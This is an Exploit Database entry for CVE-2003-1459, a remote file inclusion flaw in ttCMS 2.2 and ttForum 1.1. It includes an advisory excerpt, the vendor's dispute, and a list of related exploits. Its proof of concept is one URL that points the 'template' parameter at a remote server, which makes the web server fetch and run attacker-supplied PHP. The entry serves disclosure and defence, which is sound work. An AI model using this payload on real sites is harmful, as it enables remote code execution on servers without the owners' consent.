Exploit Database - Logo

ttCMS 2.2 / ttForum 1.1 - news.php template Parameter Remote File Inclusion

EDB-ID: 22577 Author: Charles Reinold Published: 2003-05-09
CVE: CVE-2003-1459 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/7542/info

A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.

Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.

There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.


http://www.example.com/ttforum/index.php?action=news;board=1;
template=http://www.yourserver.com/modules/forum/helpadmin;ext=help

Related Exploits

Trying to match CVEs (1): CVE-2003-1459
Trying to match OSVDBs (1): 54041
Other Possible E-DB Search Terms: ttCMS 2.2 / ttForum 1.1,  ttCMS 2.2,  ttCMS
Date D V Title Author
2003-05-20Download Exploit Code Verified ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL InjectionScriptSlave...
2010-04-04Download Exploit Code Waiting verification ttCMS 5.0 - Remote File InclusionITSecTeam
2003-05-09Download Exploit Code Verified ttCMS 2.2 / ttForum 1.1 - install.php installdir Parameter Remote File InclusionCharles Rei...
2003-05-17Download Exploit Code Verified ttCMS 2.2/2.3 - header.php Remote File InclusionScriptSlave...
2007-03-24Download Exploit Code Verified ttCMS 4 - 'ez_sql.php lib_path' Remote File InclusionKacper
Menu